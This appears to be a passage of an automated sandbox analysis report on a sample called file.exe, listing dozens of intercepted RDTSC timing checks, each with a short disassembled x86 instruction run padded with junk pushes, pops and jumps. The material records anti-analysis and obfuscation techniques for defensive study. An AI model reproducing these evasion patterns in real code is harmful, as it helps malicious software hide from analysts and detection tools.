            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708BD1 second address: 708BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709BB1 second address: 709BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BAF1 second address: 70BB0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47999h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CA3D second address: 70CA4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CA4D second address: 70CA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB53 second address: 70CB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F377C5325E6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711A57 second address: 711A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712976 second address: 712980 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED25 second address: 70ED36 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F377CE47988h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA7C second address: 70FA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA80 second address: 70FA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711BC8 second address: 711BDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F377C5325EEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70FA86 second address: 70FB11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F377CE47986h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 call 00007F377CE4798Bh 0x00000015 pop ebx 0x00000016 mov dword ptr [ebp+1247E03Eh], ecx 0x0000001c popad 0x0000001d push dword ptr fs:[00000000h] 0x00000024 jo 00007F377CE4798Ch 0x0000002a mov dword ptr [ebp+1246C8C9h], eax 0x00000030 mov dword ptr [ebp+12495C4Bh], edx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bl, 78h 0x0000003f mov eax, dword ptr [ebp+122D025Dh] 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F377CE47988h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov di, dx 0x00000062 add edi, dword ptr [ebp+122D31E1h] 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D331Fh], ebx 0x00000070 mov edi, eax 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jnl 00007F377CE47986h 0x0000007c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71486F second address: 714873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716C64 second address: 716C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7149A8 second address: 714A40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F377C5325F4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jbe 00007F377C5325F1h 0x0000001c or dword ptr [ebp+1247532Ch], esi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F377C5325E8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D0F0Dh] 0x00000049 or dword ptr [ebp+122D3015h], ebx 0x0000004f push FFFFFFFFh 0x00000051 jmp 00007F377C5325F6h 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F377C5325F1h 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716C6C second address: 716C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE750 second address: 6AE754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D142 second address: 71D152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE4798Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D152 second address: 71D156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACC67 second address: 6ACC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F377CE47986h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720015 second address: 720029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72027F second address: 7202B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F377CE47986h 0x0000000a jmp 00007F377CE4798Ah 0x0000000f jmp 00007F377CE47994h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F377CE4798Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7202B9 second address: 7202BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724C59 second address: 724C6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jl 00007F377CE4798Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724C6B second address: 724C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F377C5325ECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724DE7 second address: 724E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A426 second address: 72A430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F377C5325E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A430 second address: 72A436 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AE8E second address: 72AE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1A8 second address: 72B1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1AF second address: 72B1D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F377C5325E8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F377C5325F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B1D5 second address: 72B1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B32B second address: 72B346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F377C5325F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B346 second address: 72B34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B5B9 second address: 72B605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F377C5325E6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F377C5325F2h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F377C5325F8h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop ebx 0x0000001e jnc 00007F377C5325EEh 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B605 second address: 72B60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E0DC second address: 72E13F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F377C5325F2h 0x00000008 pop edx 0x00000009 jmp 00007F377C5325EAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F377C5325EEh 0x00000019 pop ecx 0x0000001a jmp 00007F377C5325F9h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F377C5325F1h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E13F second address: 72E143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734355 second address: 73435A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A26 second address: 6E33DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F377CE47988h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1D93h], ecx 0x0000002a lea eax, dword ptr [ebp+124997A0h] 0x00000030 mov dword ptr [ebp+122D1D6Dh], edi 0x00000036 push eax 0x00000037 jmp 00007F377CE47997h 0x0000003c mov dword ptr [esp], eax 0x0000003f mov dword ptr [ebp+122D1D93h], ecx 0x00000045 call dword ptr [ebp+122D307Eh] 0x0000004b pushad 0x0000004c jp 00007F377CE4798Ah 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9B0F second address: 6F9B15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA04A second address: 6FA064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F377CE47991h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0E7 second address: 6FA0ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA0ED second address: 6FA145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F377CE47994h 0x00000008 jne 00007F377CE47986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F377CE47992h 0x00000018 jmp 00007F377CE4798Eh 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D3319h], ecx 0x00000025 nop 0x00000026 pushad 0x00000027 push edi 0x00000028 jl 00007F377CE47986h 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA145 second address: 6FA149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA24F second address: 6FA285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 jmp 00007F377CE4798Bh 0x0000000d mov eax, dword ptr [eax] 0x0000000f jl 00007F377CE479ABh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F377CE47999h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA285 second address: 6FA289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA4CA second address: 6FA4DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F377CE4798Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA93D second address: 6FA94A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA94A second address: 6FA950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB86 second address: 6FAC20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F377C5325E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, 787D3DC0h 0x00000014 lea eax, dword ptr [ebp+124997E4h] 0x0000001a jmp 00007F377C5325F7h 0x0000001f mov ch, bl 0x00000021 nop 0x00000022 push ebx 0x00000023 jmp 00007F377C5325F9h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a jnp 00007F377C5325EEh 0x00000030 nop 0x00000031 push edx 0x00000032 mov di, 157Fh 0x00000036 pop ecx 0x00000037 lea eax, dword ptr [ebp+124997A0h] 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F377C5325E8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov edi, 7EB5B63Dh 0x0000005c nop 0x0000005d jng 00007F377C5325F4h 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAC20 second address: 6FAC31 instructions: 0x00000000 rdtsc 0x00000002 je 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAC31 second address: 6E3E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F377C5325E8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 jmp 00007F377C5325F4h 0x00000026 call dword ptr [ebp+122D1CCCh] 0x0000002c pushad 0x0000002d jmp 00007F377C5325F4h 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 je 00007F377C5325E6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E0E second address: 734E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E13 second address: 734E20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E20 second address: 734E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734E26 second address: 734E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F6B second address: 734F71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F71 second address: 734F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F377C5325E6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F81 second address: 734F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F85 second address: 734F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B87A0 second address: 6B87BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F377CE47996h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B87BC second address: 6B87D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325F0h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73AED7 second address: 73AEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B083 second address: 73B089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B089 second address: 73B08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B206 second address: 73B20A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4C2 second address: 73B4DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F377CE47986h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F377CE47986h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4DD second address: 73B4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4E1 second address: 73B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4E7 second address: 73B4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4ED second address: 73B50E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F377CE47986h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B669 second address: 73B674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F377C5325E6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B674 second address: 73B67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B67A second address: 73B691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F3h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B915 second address: 73B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7412BD second address: 7412C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCD9 second address: 73FCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F377CE47988h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCE7 second address: 73FCF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FF93 second address: 73FF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7400E3 second address: 7400EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7400EF second address: 7400F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740244 second address: 74026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F377C5325FFh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74026E second address: 740298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F377CE47986h 0x00000010 jl 00007F377CE47986h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740401 second address: 740406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740559 second address: 74055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74055E second address: 740564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740564 second address: 74058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F377CE47999h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F377CE47986h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
